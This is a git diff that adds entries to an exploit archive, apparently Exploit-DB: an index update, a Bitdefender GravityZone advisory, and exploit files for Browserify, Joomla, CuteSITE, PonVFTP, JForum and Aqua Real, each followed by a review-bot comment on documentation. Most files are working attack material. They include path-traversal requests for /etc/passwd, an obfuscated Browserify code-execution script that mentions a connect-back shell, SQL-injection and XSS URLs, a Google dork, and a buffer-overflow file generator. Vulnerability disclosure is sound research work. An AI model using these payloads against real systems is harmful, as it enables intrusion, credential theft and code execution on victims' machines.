diff --git a/files.csv b/files.csv
index 384f0c248..25d7c5851 100755
--- a/files.csv
+++ b/files.csv
@@ -30694,3 +30694,13 @@ id,file,description,date,author,platform,type,port
34083,platforms/php/webapps/34083.txt,"Western Digital My Book World Edition 1.1.16 'lang' Parameter Cross-Site Scripting Vulnerabilities",2009-12-30,emgent,php,webapps,0
34084,platforms/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",php,webapps,0
34085,platforms/php/webapps/34085.txt,"Gigya Socialize Plugin 1.0/1.1.x for Wordpress Cross Site Scripting Vulnerability",2010-06-04,MustLive,php,webapps,0
+34086,platforms/linux/webapps/34086.txt,"Bitdefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443
+34087,platforms/php/webapps/34087.txt,"Joomla Youtube Gallery Component - SQL Injection Vulnerability",2014-07-16,"Pham Van Khanh",php,webapps,80
+34088,platforms/android/remote/34088.html,"Boat Browser 8.0 and 8.0.1 - Remote Code Execution Vulnerability",2014-07-16,c0otlass,android,remote,0
+34090,platforms/multiple/dos/34090.py,"Node Browserify 4.2.0 - Remote Code Execution Vulnerability",2014-07-16,"Cal Leeming",multiple,dos,0
+34091,platforms/php/webapps/34091.txt,"Pay Per Minute Video Chat Script 2.x SQL Injection and Multiple Cross Site Scripting Vulnerabilities",2010-01-04,R3d-D3V!L,php,webapps,0
+34092,platforms/jsp/webapps/34092.txt,"JForum 2.1.8 'bookmarks' Module Multiple HTML Injection Vulnerabilities",2010-06-06,"Adam Baldwin",jsp,webapps,0
+34094,platforms/windows/dos/34094.pl,"Aqua Real Screensaver '.ar' File Buffer Overflow Vulnerability",2010-01-15,R3d-D3V!L,windows,dos,0
+34095,platforms/php/webapps/34095.txt,"PonVFTP 'login.php' SQL Injection Vulnerability",2010-01-15,S2K9,php,webapps,0
+34096,platforms/php/webapps/34096.txt,"CuteSITE CMS 1.x manage/add_user.php user_id Parameter SQL Injection",2010-06-06,"High-Tech Bridge SA",php,webapps,0
+34097,platforms/php/webapps/34097.txt,"CuteSITE CMS 1.x manage/main.php fld_path Parameter XSS",2010-06-06,"High-Tech Bridge SA",php,webapps,0
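Review bot: The row for 34090 is filed as type `dos` under platforms/multiple/dos/ while its own description reads "Remote Code Execution Vulnerability"; either move it to `remote` or correct the description so the index and the file agree. The block also skips ids 34089 and 34093, so confirm those gaps are intentional. The new rows use a " - " separator before the vulnerability class while the surrounding older rows do not; pick one style for this batch.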
diff --git a/platforms/android/remote/34088.html b/platforms/android/remote/34088.html
new file mode 100755
index 000000000..571ad1e11
--- /dev/null
+++ b/platforms/android/remote/34088.html
@@ -0,0 +1,72 @@
+
+
+
+
+
+CreatMalTxt POC - WebView
+
+
+
+
CreatMalTxt POC
+
+
+
+
+
+
\ No newline at end of file
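Review bot: As added, 34088.html carries only the title "CreatMalTxt POC - WebView" and no header naming the affected product, versions, author or date; those appear only in the files.csv row (Boat Browser 8.0 and 8.0.1, c0otlass). Add a comment block at the top with that information and a short description of the flaw so the file is usable for triage on its own, and end the file with a newline.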
diff --git a/platforms/jsp/webapps/34092.txt b/platforms/jsp/webapps/34092.txt
new file mode 100755
index 000000000..7f5eb0c66
--- /dev/null
+++ b/platforms/jsp/webapps/34092.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40600/info
+
+JForum is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+JForum 2.1.8 is vulnerable; other versions may also be affected.
+
+https://www.example.com/forum/bookmarks/insert/2/1.page?action=insertSave&description=&module=bookmarks&relation_id=1&relation_type=2&title=&visible=1
\ No newline at end of file
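Review bot: The example URL on the last line leaves `description=` and `title=` empty, so the file never states which bookmark fields reach the page unencoded, even though the text speaks of multiple HTML-injection issues. Name the affected parameters in the prose so a maintainer knows which outputs need encoding, and end the file with a newline.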
diff --git a/platforms/linux/webapps/34086.txt b/platforms/linux/webapps/34086.txt
new file mode 100755
index 000000000..ac1741649
--- /dev/null
+++ b/platforms/linux/webapps/34086.txt
@@ -0,0 +1,166 @@
+SEC Consult Vulnerability Lab Security Advisory < 20140716-3 >
+=======================================================================
+ title: Multiple critical vulnerabilities
+ product: Bitdefender GravityZone
+ vulnerable version: <5.1.11.432
+ fixed version: >=5.1.11.432
+ impact: critical
+ homepage: http://www.bitdefender.com
+ found: 2014-05-22
+ by: Stefan Viehböck
+ SEC Consult Vulnerability Lab
+ https://www.sec-consult.com
+=======================================================================
+
+Vendor description:
+-------------------
+Bitdefender GravityZone lets enterprises control and protect the heterogeneous
+environments of today. The solution combines highly optimized virtualization
+aware security with leading detection technologies and a fresh, but proven,
+architecture. It empowers administrators with features adapted to reduce the
+daily security hassle and eliminate the need for point solutions with unified
+protection across virtualized, physical, and mobile endpoints. Unlike other
+solutions that bolt-on modules to an aging architecture, the GravityZone
+Control Center dashboard has been designed specifically to unify monitoring
+and security management in a single simple and accessible interface.
+
+Source: http://download.bitdefender.com/resources/media/materials/business/en/datasheet-gravityzone-brief.pdf
+
+
+Business recommendation:
+------------------------
+Attackers are able to completely compromise the Bitdefender GravityZone
+solution as they can gain system and database level access.
+Furthermore attackers can manage all endpoints.
+
+The Bitdefender GravityZone can be used as an entry point into the target
+infrastructure (lateral movement, privilege escalation).
+
+It is highly recommended by SEC Consult not to use this software until a
+thorough security review has been performed by security professionals and all
+identified issues have been resolved.
+
+
+Vulnerability overview/description:
+-----------------------------------
+1) Unauthenticated local file disclosure (Web Console, Update Server)
+Unauthenticated users can read arbitrary files from the filesystem with the
+privileges of the "nginx" operating system user. These files include
+configuration files containing sensitive information such as clear text
+passwords which can be used in further attacks.
+
+Separate vulnerabilities affecting both Web Console and Update Server were
+found.
+
+
+2) Insecure service configuration / design issues
+The MongoDB database which is offered via the network by default (TCP ports
+27017, 28017) can be accessed using hardcoded credentials which can't be
+changed. The overall system design requires the database to be accessible via
+the network.
+All relevant GravityZone configuration data can be accessed and changed. This
+includes the user table.
+
+Excerpt from the documentation describing the TCP port 27017:
+"Default port used by the Communication Server and Control Center to access
+the Database."
+
+
+3) Missing authentication
+Authentication is not required for certain scripts in the web UI. This
+allows unauthenticated attackers to execute administrative functions without
+prior authentication.
+
+
+Proof of concept:
+-----------------
+1) Unauthenticated local file disclosure (Web Console, Update Server)
+Arbitrary files can be downloaded via a vulnerable script:
+https:///webservice/CORE/downloadFullKitEpc/a/1?id=../../../../../etc/passwd
+
+The Update Server is vulnerable to local file disclosure as well. Arbitrary
+files can be downloaded using the following HTTP request:
+
+GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
+Host: :7074
+
+2) Insecure service configuration / Design issues
+Attackers can connect to MongoDB on TCP ports 27017 and 28017 using the
+following hardcoded credentials:
+Username:
+Password:
+
+Detailed proof of concept exploits have been removed for this vulnerability.
+
+3) Missing authentication
+Authentication is not required for the following script:
+/webservice/CORE/downloadSignedCsr (Unauthenticated certificate upload)
+
+
+
+Vulnerable / tested versions:
+-----------------------------
+The vulnerabilities have been verified to exist in GravityZone 5.1.5.386,
+which was the most recent version at the time of discovery.
+
+
+
+Vendor contact timeline:
+------------------------
+2014-05-26: Sending responsible disclosure policy and requesting encryption
+ keys.
+2014-05-26: Vendor responds providing encryption keys.
+2014-05-26: Sending advisory and proof of concept exploit via encrypted
+ channel.
+2014-05-26: Vendor confirms receipt.
+2014-06-04: Requesting status update.
+2014-06-14: Vendor provides status update. Update will be released "End of
+ June".
+2014-06-26: Vendor provides status update. Update for issue #1 and #3 will
+ be released June 30. Update for issue #2 will be released at the
+ end of July.
+2014-06-27: Requesting info about other affected products. Clarifying
+ disclosure of issue #2.
+2014-07-09: Vendor confirms that update for issue #1 and #3 has been shipped
+ and KB article for issue #2 will be released.
+2014-07-15: Requesting version numbers of affected products.
+2014-07-16: SEC Consult releases coordinated security advisory.
+
+
+
+Solution:
+---------
+Update to a more recent version of Bitdefender GravityZone _and_
+implement mitigations for the issue #2.
+
+More information can be found at:
+http://www.bitdefender.com/support/how-to-configure-iptables-firewall-rules-on-gravityzone-for-restricting-outside-access-to-mongodatabase-1265.html
+
+
+Workaround:
+-----------
+No workaround available.
+
+
+Advisory URL:
+-------------
+https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+SEC Consult Vulnerability Lab
+
+SEC Consult
+Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
+
+Headquarter:
+Mooslackengasse 17, 1190 Vienna, Austria
+Phone: +43 1 8903043 0
+Fax: +43 1 8903043 15
+
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
+
+EOF Stefan Viehböck / @2014
\ No newline at end of file
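Review bot: In the proof-of-concept section the host placeholder has been lost (`https:///webservice/CORE/...` and `Host: :7074`) and the `Username:` and `Password:` lines under issue 2 are empty although the sentence above them announces "the following hardcoded credentials"; restore a visible placeholder for the host and state explicitly that the credential values were redacted, so the text does not read as corrupted. The "Workaround" section says none is available while "Solution" links an iptables article as mitigation for issue #2; reword one of them so the guidance for restricting TCP 27017/28017 is not contradicted. The files.csv title cites 5.1.5.386 only, whereas the header gives the vulnerable range as <5.1.11.432.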
diff --git a/platforms/multiple/dos/34090.py b/platforms/multiple/dos/34090.py
new file mode 100755
index 000000000..b4e15e5f7
--- /dev/null
+++ b/platforms/multiple/dos/34090.py
@@ -0,0 +1,43 @@
+#!/usr/bin/python
+
+"""
+Browserify POC exploit
+
+http://iops.io/blog/browserify-rce-vulnerability/
+
+To run, just do:
+
+$ python poc.py > exploit.js
+$ browserify exploit.js
+BITCH I TOLD YOU THIS SHIT IS FABULOUS
+[[garbage output]]
+},{}]},{},[1]) 00:08:32 up 12:29, 3 users, load average: 0.00, 0.02, 0.05
+uid=1001(foxx) gid=1001(foxx) groups=1001(foxx),27(sudo),105(fuse)
+
+You can also spawn() and create a connect back shell.
+
+Enjoy
+
+"""
+
+def charencode(string):
+ encoded=''
+ for char in string:
+ encoded=encoded+","+str(ord(char))
+ return encoded[1:]
+
+plaintext = """
+ var require = this.process.mainModule.require;
+ var sys = require('sys')
+ var exec = require('child_process').exec;
+ function puts(error, stdout, stderr) { sys.puts(stdout) }
+ exec("uptime && id", puts);
+ console.log("BITCH I TOLD YOU THIS SHIT IS FABULOUS");
+"""
+
+payload = charencode(plaintext)
+final = "eval(String.fromCharCode(%s));" %(payload)
+
+print "});"
+print final
+print "(function(){"
\ No newline at end of file
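Review bot: The docstring gives run instructions and sample output but never states the affected Browserify version (files.csv says 4.2.0) or which part of the bundling step evaluates the input; add a short description and the fixed version if known, so a reader can tell whether a given build pipeline is exposed without following the external link. The usage line refers to `poc.py` while the file is committed as 34090.py.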
diff --git a/platforms/php/webapps/34087.txt b/platforms/php/webapps/34087.txt
new file mode 100755
index 000000000..9ca14e854
--- /dev/null
+++ b/platforms/php/webapps/34087.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Joomla component com_youtubegallery - SQL Injection
+vulnerability
+# Google Dork: inurl:index.php?option=com_youtubegallery
+# Date: 15-07-2014
+# Exploit Author: Pham Van Khanh (phamvankhanhbka@gmail.com)
+# Vendor Homepage: http://www.joomlaboat.com/youtube-gallery
+# Software Link: http://www.joomlaboat.com/youtube-gallery
+# Version: 4.x ( 3.x maybe)
+# Tested on: newest version 4.1.7 on Joomla 1.5, 2.5, 3
+# CVE : CVE-2014-4960
+
+Detail:
+In line: 40, file: components\com_youtubegallery\models\gallery.php,
+if parameter listid is int (or can cast to int), $listid and $themeid
+will not santinized.
+Source code:
+40: if(JRequest::getInt('listid'))
+41: {
+42: //Shadow Box
+43: $listid=JRequest::getVar('listid');
+44:
+45:
+46: //Get Theme
+47: $m_themeid=(int)JRequest::getVar('mobilethemeid');
+48: if($m_themeid!=0)
+49: {
+50: if(YouTubeGalleryMisc::check_user_agent('mobile'))
+51: $themeid=$m_themeid;
+52: else
+53: $themeid=JRequest::getVar('themeid');
+54: }
+55: else
+56: $themeid=JRequest::getVar('themeid');
+57: }
+After, $themeid and $listid are used in line 86, 92. Two method
+getVideoListTableRow and getThemeTableRow concat string to construct
+sql query. So it is vulnerable to SQL Injection.
+Source code:
+86: if(!$this->misc->getVideoListTableRow($listid))
+87: {
+88: echo '
';
+95: return false;
+96: }
+
+# Site POF: http://server/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1'&videoid=ETMVUuFbToQ&tmpl=component&TB_iframe=true&height=500&width=700
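Review bot: The second source excerpt jumps from line 88 to line 95, so line 92, which the text cites as the `getThemeTableRow` call using `$themeid`, is not shown and the claim cannot be checked from this file; restore lines 89 to 94. The write-up also lacks a remediation line: the excerpt itself shows the safe pattern on line 47 (`(int)JRequest::getVar('mobilethemeid')`), and the same cast or `JRequest::getInt` should be recommended for `listid` and `themeid` on lines 43, 53 and 56. Minor: "santinized" should be "sanitized" and "Site POF" presumably means "PoC".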
diff --git a/platforms/php/webapps/34091.txt b/platforms/php/webapps/34091.txt
new file mode 100755
index 000000000..f0bc52f9b
--- /dev/null
+++ b/platforms/php/webapps/34091.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/40585/info
+
+Pay Per Minute Video Chat Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Cross-site scripting:
+
+http://www.example.com/P47H/admin/memberviewdetails.php?id=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E
+
+http://www.example.com/P47H/videos.php?model=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E
+
+
+SQL-injection:
+
+http://www.example.com/P47H/index_ie.php?page=-666
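Review bot: The text never states which release is affected; the version ("2.x") appears only in the files.csv row. Add a "... 2.x is vulnerable" line as the other BID-derived entries in this commit do. The SQL-injection example `index_ie.php?page=-666` is given without naming `page` as the unsanitized parameter in the prose, and the two cross-site scripting URLs likewise leave `id` and `model` unnamed; list the parameters so the fix locations are explicit.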
diff --git a/platforms/php/webapps/34095.txt b/platforms/php/webapps/34095.txt
new file mode 100755
index 000000000..4dbf7ba49
--- /dev/null
+++ b/platforms/php/webapps/34095.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40608/info
+
+PonVFTP is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following example data is available:
+
+password: 'or' 1=1
\ No newline at end of file
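Review bot: The line "The following example data is available:" is followed by a password value with no indication of which script or form field receives it; files.csv names `login.php`, but the file itself does not. State the script and field and the affected version in the description, and end the file with a newline.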
diff --git a/platforms/php/webapps/34096.txt b/platforms/php/webapps/34096.txt
new file mode 100755
index 000000000..cabcded2a
--- /dev/null
+++ b/platforms/php/webapps/34096.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40612/info
+
+CuteSITE CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+CuteSITE CMS 1.5.0 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/manage/add_user.php?user_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user%28%29,15,16
\ No newline at end of file
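Review bot: The description paragraph covers both an SQL-injection and a cross-site scripting issue, yet this file holds only the `add_user.php` `user_id` SQL-injection example, and the identical paragraph is repeated in 34097.txt for the XSS case. Trim each file's description to the issue it documents, or cross-reference the sibling entry by id, so the files.csv titles and the file contents line up.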
diff --git a/platforms/php/webapps/34097.txt b/platforms/php/webapps/34097.txt
new file mode 100755
index 000000000..5e24c62ef
--- /dev/null
+++ b/platforms/php/webapps/34097.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40612/info
+
+CuteSITE CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+CuteSITE CMS 1.5.0 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/manage/main.php?fld_path=XXX%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
\ No newline at end of file
diff --git a/platforms/windows/dos/34094.pl b/platforms/windows/dos/34094.pl
new file mode 100755
index 000000000..29292fb5f
--- /dev/null
+++ b/platforms/windows/dos/34094.pl
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/40606/info
+
+Aqua Real Screensaver is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
+
+Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed attacks will cause denial-of-service conditions.
+
+Aqua Real 1 and 2 are vulnerable; other versions may also be affected.
+
+#!c/perl/bin/
+my $file= "Crash.ar";
+my $boom="\x41" x 5000;
+open(myfile,'>>Crash.ar') || die "Cannot Creat file\n\n";
+print myfile $boom;
+print "Done..!~#\n";
\ No newline at end of file
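Review bot: The file is committed with a .pl extension but opens with eight lines of uncommented advisory prose, so the `#!c/perl/bin/` line is not the first line and the file does not parse as Perl; prefix the header lines with `#` or store the entry as .txt. In the script, `$file` is assigned and never used because the name is hard-coded again in `open`, and the bareword filehandle is opened in append mode and never closed.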